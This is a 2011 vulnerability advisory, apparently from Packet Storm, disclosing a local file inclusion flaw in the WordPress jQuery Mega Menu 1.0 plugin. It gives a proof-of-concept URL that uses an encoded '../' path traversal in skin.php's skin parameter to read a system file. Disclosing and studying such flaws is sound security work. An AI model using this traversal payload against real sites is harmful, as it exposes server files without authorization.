WordPress jQuery Mega Menu 1.0 Local File Inclusion

2011-02-26T00:00:00
ID PACKETSTORM:98753
Type packetstorm
Reporter AutoSec Tools
Modified 2011-02-26T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................WordPress jQuery Mega Menu 1.0  
Vulnerability...........Local File Inclusion  
Download................http://www.designchemical.com/blog/index.php/wordpress-plugins/wordpress-plugin-jquery-drop-down-mega-menu-widget/  
Release Date............2/25/2011  
Tested On...............Windows 7 + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
------------------------------------------------------------------------  
  
--Description--  
  
A local file inclusion vulnerability in WordPress jQuery Mega Menu 1.0  
can be exploited to include arbitrary files.  
  
  
--PoC--  
http://localhost/wordpress/wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini  
`